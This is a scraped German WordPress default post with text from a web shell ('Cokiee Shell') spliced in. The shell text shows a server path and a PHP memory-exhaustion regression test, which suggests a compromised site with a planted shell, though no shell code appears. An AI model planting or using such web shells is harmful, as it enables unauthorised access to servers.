Willkommen bei WordPress. Dies ist dein erster Beitrag. Bearbeite oder lösche ihn und beginne mit dem Schreiben!
Hallo Welt!
von raredesign | Dez 3, 2019 | Allgemein | 0 Kommentare
Cokiee Shell
Current Path : /usr/local/src/php7/php-7.0.5/Zend/tests/ |
Current File : //usr/local/src/php7/php-7.0.5/Zend/tests/bug70258.phpt |
--TEST-- Bug #70258 (Segfault if do_resize fails to allocated memory) --INI-- memory_limit=2M --SKIPIF-- <?php $zend_mm_enabled = getenv("USE_ZEND_ALLOC"); if ($zend_mm_enabled === "0") { die("skip Zend MM disabled"); } ?> --FILE-- <?php class A { public $arr; public function core() { $this->arr["no_pack"] = 1; while (1) { $this->arr[] = 1; } } } $a = new A; $a->core(); ?> --EXPECTF-- Fatal error: Allowed memory size of 2097152 bytes exhausted%s(tried to allocate %d bytes) in %s on line %d
Cokiee Shell Web 1.0, Coded By Razor
Neueste Kommentare